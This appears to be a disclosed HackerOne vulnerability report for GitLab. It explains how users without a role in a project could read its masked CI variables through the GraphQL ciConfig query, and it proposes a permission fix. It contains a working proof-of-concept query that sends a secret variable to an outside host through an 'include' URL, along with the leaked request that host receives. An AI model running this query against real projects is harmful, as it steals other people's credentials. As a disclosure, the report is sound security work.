Backend: Unallowed users can read masked CI variables of Gitlab projects
HackerOne report #1511133 by shells3c on 2022-03-14, assigned to @dcouture:
Report
Summary
External users/users without privilege/guests (depends on project visibility) can access CI variables of a Gitlab project using GraphQL. The table below explains all situations that a user can access CI variables:
| Project visibility | Public Project | Internal Project | Private Project |
|---|---|---|---|
| External user | Yes | No | No |
| User | Yes | Yes | No |
| Guest | Yes | Yes | Yes |
Steps to reproduce
- Create a project, then create a masked CI variable in the project name
PASSWORD, disable Protect variable and enable Mask variable - From another account (no role in the project), run the following query in the GraphQL Explorer
{
ciConfig(
projectPath: "dcouture/public_project"
content: "include: https://[redacted]/$VARIABLE_NAME.yaml"
) {
errors
}
}- The server at
example.comwill receive the following request
GET /[YOUR PASSWORD HERE].yaml HTTP/1.0
Host: [redacted]
Connection: close
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: RubyWhat is the current bug behavior?
GraphQL operation getCiConfigData loads all CI variables of the project including custom ones in the background
What is the expected correct behavior?
GraphQL operation getCiConfigData shouldn't be able to access project's custom variables
Output of checks
This bug happens on GitLab.com
Impact
Accessing CI variables, including sensitive masked variables of Gitlab projects without permission
Proposal
Update Resolvers::Ci::ConfigResolver to authorize using the create_pipeline policy.